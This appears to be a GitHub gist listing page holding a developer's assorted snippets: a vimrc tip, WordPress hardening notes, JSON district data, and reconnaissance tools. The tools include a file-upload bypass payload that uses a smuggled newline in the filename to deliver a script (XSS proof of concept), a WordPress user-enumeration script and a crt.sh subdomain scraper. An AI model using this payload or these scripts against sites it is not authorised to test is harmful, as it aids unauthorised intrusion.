This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Go to home path $HOME | |
| Create .vimrc | |
| ADD this line : | |
| set nocompatible | |
| Save |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filename="/./hey/.js?c=a.pnG%0a\" | |
| Content-Type: | |
| <html><script>alert(0)</script> | |
| File uploader was looking for .png, but we break it with pnG%0a - blank content type and it defaults to what it can detect in the file |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##Change Database Prefix | |
| Do not use wp_ | |
| Replace testsite_ | |
| ##Permissions | |
| wp-config.php -> 400 | |
| uploads folder -> 755 | |
| htaccess files -> 400 | |
| ##Security Plugins |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "d": [ | |
| { | |
| "__type": "District:alpha.library", | |
| "RowNum": 0, | |
| "RowTotal": 0, | |
| "DistrictID": 68, | |
| "DistrictName": "Acham", | |
| "ZoneID": 0, |
gitnepal
/ wpusers.sh
Created
May 31, 2018 16:06
WordPress Users Enumeration {/wp-json/wp/v2/users} - Short and easy , @gitnepal
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #curl"//wp-json/wp/v2/users" //rootnep.al /@___0x00 | |
| if [[ $# -eq 0 ]] ; | |
| then | |
| echo "Usage: ./wpuser.sh wpdomain" | |
| exit 1 | |
| else | |
| curl 'https://'$1'/wp-json/wp/v2/users' | jq '.[]|.slug' | tr -d '"' | sort -u > $1.txt | |
| echo "Users:" | |
| cat $1.txt |
gitnepal
/ crt.sh
Last active
January 22, 2021 22:10
Bash Script to pull list of domains from http://crt.sh for automation and lazy recon @nahamsec / @gitnepal
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Thanks @nahamsec tweets, @___0x00 | |
| if [[ $# -eq 0 ]] ; | |
| then | |
| echo "Usage: ./crt.sh domainname" | |
| exit 1 | |
| else | |
| curl 'https://crt.sh/?q=%.'$1'&output=json' | jq '.[] | {name_value}' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > $1.txt | |
| cat $1.txt | |
| fi |
NewerOlder